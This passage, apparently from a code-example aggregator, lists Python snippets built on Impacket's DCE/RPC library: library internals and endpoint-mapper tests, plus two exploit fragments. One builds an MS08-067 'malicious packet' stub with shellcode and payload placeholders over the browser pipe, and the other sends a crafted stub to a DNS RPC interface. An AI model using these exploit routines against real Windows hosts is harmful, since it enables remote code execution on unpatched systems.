            if self.structure64 != ():
                self.structure = self.structure64
            if hasattr(self, 'align64'):
                self.align = self.align64
            # And check whether the changes changed the data types
            # if so, I need to instantiate the new ones and copy the
            # old values
            for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
                if isinstance(self.fields[fieldName], NDR):
                    if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
                        # Keep the old value, rebuild the field with the
                        # new type, then put the value back.
                        backupData = self[fieldName]
                        self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
                        if self.fields[fieldName].fields.has_key('Data'):
                            self.fields[fieldName].fields['Data'] = backupData
                        else:
                            self[fieldName] = backupData
    else:
        if self._isNDR64 is True:
            # Ok, nothing for now
            # NOTE(review): a bare ``raise`` with no exception being
            # handled fails with an unrelated error; an explicit exception
            # with a message would state the intent.
            raise
Example #25
Source File: 070415.py From d4rkc0de with GNU General Public License v2.0 | 5 votes |
def ExploitDNS(target, port):
    """Send one crafted call to the RPC interface listening on ``target:port``.

    Binds to interface 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 over
    plain TCP and calls opnum 0x01 with ``stub``, a module-level buffer
    that is not part of this excerpt.

    Defender note: no authentication is configured before the bind, so as
    written the only precondition is that the port is reachable. Keeping
    the service patched and limiting RPC ports to administrative hosts
    are the mitigations; a bind to this interface from an unexpected
    source is the detection cue.
    """
    trans = transport.TCPTransport(target, port)
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))
    dce.call(0x01, stub)
Example #26
Source File: ms08-067_exploit_31874.py From WHP with Do What The F*ck You Want To Public License | 5 votes |
def __DCEPacket(self):
    """Connect to the browser named pipe of ``self.target`` and build the request stub.

    Opens an ``ncacn_np`` transport to the browser pipe, binds to
    interface 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 and assembles
    ``self.__stub``. Nothing is sent to the bound interface in this
    method. ``shellcode`` and ``payload`` are names defined elsewhere in
    the file and not part of this excerpt.

    Defender note: going by the file name this belongs to an MS08-067
    proof of concept. No credentials are configured before the pipe is
    opened. Applying the MS08-067 update and keeping SMB (139/445) closed
    to untrusted networks are the mitigations; a bind to this interface
    over the browser pipe from an unexpected host is the detection cue.

    NOTE(review): Python 2 only (print statement).
    """
    print '[-]Initiating connection'
    self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
    self.__trans.connect()
    print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
    self.__dce = self.__trans.DCERPC_class(self.__trans)
    self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
    # Constructing Malicious Packet
    self.__stub='\x01\x00\x00\x00'
    self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
    self.__stub+=shellcode
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x00\x00\x00\x00'
    self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
    self.__stub+=payload
    self.__stub+='\x00\x00\x00\x00'
    self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
    self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
    self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
    self.__stub+='\x01\x00\x00\x00'
    return
Example #27
Source File: test_dcomrt.py From cracke-dit with MIT License | 5 votes |
def test_RemoteGetClassObject(self):
    """Fetch a class object for ``comev.CLSID_EventSystem`` and release it.

    Requests the interface 00000001-0000-0000-C000-000000000046 v0.0
    (named IID_IClassFactory in the original test) through
    ``IRemoteSCMActivator``. There are no assertions: the test passes as
    long as no call raises.
    """
    dce, _ = self.connect()
    class_factory_iid = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046', '0.0'))
    activator = dcomrt.IRemoteSCMActivator(dce)
    class_object = activator.RemoteGetClassObject(comev.CLSID_EventSystem, class_factory_iid)
    class_object.RemRelease()
Example #28
Source File: test_epm.py From cracke-dit with MIT License | 5 votes |
def test_hept_map(self):
    """Resolve three well-known interfaces through the endpoint mapper.

    Calls ``epm.hept_map`` against ``self.machine`` for SAMR (default
    protocol and ``ncacn_ip_tcp``), ATSVC (default protocol) and SCMR
    (``ncacn_ip_tcp``). The responses are not inspected: the test passes
    as long as no call raises.
    """
    tcp_only = {'protocol': 'ncacn_ip_tcp'}
    # (interface UUID, version) -> keyword arguments of each lookup, in order.
    lookups = (
        (('12345778-1234-ABCD-EF00-0123456789AC', '1.0'), ({}, tcp_only)),  # SAMR
        (('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'), ({},)),           # ATSVC
        (('367ABB81-9844-35F1-AD32-98F038001003', '2.0'), (tcp_only,)),     # SCMR
    )
    for iface, variants in lookups:
        iface_bin = uuidtup_to_bin(iface)
        for extra in variants:
            epm.hept_map(self.machine, iface_bin, **extra)
Example #29
Source File: test_epm.py From cracke-dit with MIT License | 5 votes |
def test_hlookup(self):
    """Query the endpoint mapper of ``self.machine``, unfiltered and by interface.

    One lookup without a filter, then one ``RPC_C_EP_MATCH_BY_IF`` lookup
    each for SAMR, ATSVC and SCMR. The responses are not inspected: the
    test passes as long as no call raises.
    """
    epm.hept_lookup(self.machine)

    interfaces = (
        ('12345778-1234-ABCD-EF00-0123456789AC', '1.0'),  # SAMR
        ('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'),  # ATSVC
        ('367ABB81-9844-35F1-AD32-98F038001003', '2.0'),  # SCMR
    )
    for iface in interfaces:
        if_id = uuidtup_to_bin(iface)
        epm.hept_lookup(self.machine, inquiry_type=epm.RPC_C_EP_MATCH_BY_IF, ifId=if_id)
Example #30
Source File: rpcrt.py From cracke-dit with MIT License | 5 votes |
def __init__(self, transport):
    """Set up a DCE/RPC v5 session object on top of ``transport``.

    The session starts at ``RPC_C_AUTHN_LEVEL_NONE`` with
    ``RPC_C_AUTHN_WINNT`` as the authentication type and no credentials.
    Callers that need an authenticated, signed or sealed channel have to
    change these before binding.

    Credential material (password, LM/NT hashes, AES key, TGT/TGS, session
    and sealing keys) is held in plain instance attributes, so instances
    should not be logged or serialised.
    """
    DCERPC.__init__(self, transport)

    # Authentication defaults.
    self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
    self.__auth_type = RPC_C_AUTHN_WINNT
    self.__auth_type_callback = None
    # Flags of the authenticated session; needed for the whole connection.
    self.__auth_flags = 0

    # Credentials: nothing is known yet.
    self.__username = self.__password = None
    self.__domain = self.__lmhash = self.__nthash = self.__aesKey = ''
    self.__TGT = self.__TGS = None

    # Signing and sealing state, filled in once authentication completes.
    self.__clientSigningKey = self.__serverSigningKey = ''
    self.__clientSealingKey = self.__serverSealingKey = ''
    self.__clientSealingHandle = self.__serverSealingHandle = ''
    self.__sessionKey = None
    self.__cipher = None
    self.__confounder = ''
    self.__gss = None
    self.__sequence = 0

    # Protocol bookkeeping.
    self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    self.__callid = 1
    self._ctx = 0
    self.__max_xmit_size = 0
    self.__flags = 0